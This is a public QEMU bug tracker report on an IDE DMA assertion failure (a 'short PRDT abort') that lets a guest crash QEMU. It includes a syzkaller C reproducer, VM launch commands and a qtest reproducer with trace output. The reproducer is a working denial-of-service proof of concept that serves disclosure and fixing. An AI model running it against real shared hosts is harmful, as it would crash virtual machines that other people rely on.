QEMU

IDE short PRDT abort

Bug #1777315 reported by icytxw
272
This bug affects 3 people
Affects Status Importance Assigned to Milestone
QEMU
Expired
Undecided
Unassigned

Bug Description

Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version qemu-2.12.0

run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>

static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
        if (a0 == 0xc || a0 == 0xb) {
                char buf[128];
                sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2);
                return open(buf, O_RDWR, 0);
        } else {
                char buf[1024];
                char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
                buf[sizeof(buf) - 1] = 0;
                while ((hash = strchr(buf, '#'))) {
                        *hash = '0' + (char)(a1 % 10);
                        a1 /= 10;
                }
                return open(buf, a2, 0);
        }
}

uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
        long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
        res = syz_open_dev(0x20000000, 0, 2);
        if (res != -1)
                r[0] = res;
        res = syscall(__NR_dup2, r[0], r[0]);
        if (res != -1)
                r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3", 12);
        syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}

int main()
{
        syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
        loop();
        return 0;
}
this will crash qemu, output information:
 qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.

Thanks
owl337

icytxw (icytxw)
Changed in qemu:
assignee: nobody → icytxw (icytxw)
icytxw (icytxw)
information type: Public → Private
information type: Private → Private Security
icytxw (icytxw)
information type: Private Security → Public Security
Revision history for this message
Thomas Huth (th-huth) wrote :

Are you going to provide a patch for this to the mailing list? (since you've assigned the bug to yourself)

Revision history for this message
icytxw (icytxw) wrote :

Oh no, this is a misunderstanding.

More Details:
use this script https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh create
 wheezy.img
than run:
qemu-system-x86_64 -m 2048 -smp 1 -net nic -net user,host=10.0.2.10,hostfwd=tcp::59199-:22 -display none -serial stdio -no-reboot -enable-kvm -hda /home/icy/linux-master/wheezy.img -snapshot -kernel /home/icy/linux-master/arch/x86/boot/bzImage -append "console=ttyS0 earlyprintk=serial oops=panic nmi_watchdog=panic panic_on_warn=1 panic=86400 ftrace_dump_on_oops=orig_cpu rodata=n vsyscall=native net.ifnames=0 biosdevname=0 kvm-intel.nested=1 kvm-intel.unrestricted_guest=1 kvm-intel.vmm_exclusive=1 kvm-intel.fasteoi=1 kvm-intel.ept=1 kvm-intel.flexpriority=1 kvm-intel.vpid=1 kvm-intel.emulate_invalid_guest_state=1 kvm-intel.eptad=1 kvm-intel.enable_shadow_vmcs=1 kvm-intel.pml=1 kvm-intel.enable_apicv=1 root=/dev/sda"

bzImage is obtained by compiling v4.17 kernel(I am not sure if it works in other kernel version).

than execute the program in the virtual machine: ./repro
qemu will crash, output innformation:
 qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 == s->sg.size' failed.

this bug influences at least qemu-2.9.94 - qemu-2.12.0.

Changed in qemu:
assignee: icytxw (icytxw) → nobody
Revision history for this message
Amol Surati (asurati) wrote :

A repro for the bug is setup at https://github.com/asurati/1777315, although the rfc-patch that was sent yesterday is pending testing. Unless qemu-devel advises otherwise, I am available to test and present it as a bugfix, by tomorrow.

John Snow (jnsnow)
Changed in qemu:
assignee: nobody → John Snow (jnsnow)
status: New → In Progress
Revision history for this message
Marco Elver (melver) wrote :

FYI: we've hit this as will with syzkaller testing; this is still reproducible as-is with latest qemu (commit a6ae238), and the latest Linux kernel (5.1-rc7).

Revision history for this message
Alexander Bulekov (a1xndr) wrote :

Here's a qtest reproducer:

./i386-softmmu/qemu-system-i386 -M pc,accel=qtest \
-qtest null -nographic -vga qxl -qtest stdio \
-drive if=none,id=drive0,file=null-co://,file.read-zeroes=on,format=raw \
-drive if=none,id=drive1,file=null-co://,file.read-zeroes=on,format=raw \
-device ide-cd,drive=drive0 -device ide-hd,drive=drive1 -nodefaults \
< attachment

With -trace ide*:

[R +0.020410] outw 0x171 0xffff
28186@1594494474.407743:ide_ioport_write IDE PIO wr @ 0x171 (Features); val 0xff; bus 0x55e383419100 IDEState 0x55e383419188
28186@1594494474.407747:ide_ioport_write IDE PIO wr @ 0x172 (Sector Count); val 0xff; bus 0x55e383419100 IDEState 0x55e383419188
OK
[S +0.020428] OK
[R +0.020433] outw 0x176 0x35fb
28186@1594494474.407756:ide_ioport_write IDE PIO wr @ 0x176 (Device/Head); val 0xfb; bus 0x55e383419100 IDEState 0x55e383419188
28186@1594494474.407757:ide_ioport_write IDE PIO wr @ 0x177 (Command); val 0x35; bus 0x55e383419100 IDEState 0x55e383419558
28186@1594494474.407759:ide_exec_cmd IDE exec cmd: bus 0x55e383419100; state 0x55e383419558; cmd 0x35
....
28186@1594494474.411019:ide_dma_cb IDEState 0x55e383419558; sector_num=1 n=511 cmd=DMA WRITE
OK
[S +0.023732] OK
[R +0.023736] outb 0x376 0x8f
28186@1594494474.411060:ide_cmd_write IDE PIO wr @ 0x376 (Device Control); val 0x8f; bus 0x55e383419100
OK
[S +0.023741] OK
[R +0.023742] outw 0x376 0x2779
28186@1594494474.411064:ide_cmd_write IDE PIO wr @ 0x376 (Device Control); val 0x79; bus 0x55e383419100
OK
[S +0.023745] OK
qemu-system-i386: /home/alxndr/Development/qemu/hw/ide/core.c:880: void ide_dma_cb(void *, int): Assertion `n * 512 == s->sg.size' failed.

John Snow (jnsnow)
summary: - Denial of service
+ IDE short PRDT abort
Revision history for this message
Thomas Huth (th-huth) wrote : Moved bug report

This is an automated cleanup. This bug report has been moved
to QEMU's new bug tracker on gitlab.com and thus gets marked
as 'expired' now. Please continue with the discussion here:

 https://gitlab.com/qemu-project/qemu/-/issues/57

Changed in qemu:
assignee: John Snow (jnsnow) → nobody
status: In Progress → Expired
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Duplicates of this bug

Subscribing...

Other bug subscribers

Bug attachments

Remote bug watches

Bug watches keep track of this bug in other bug trackers.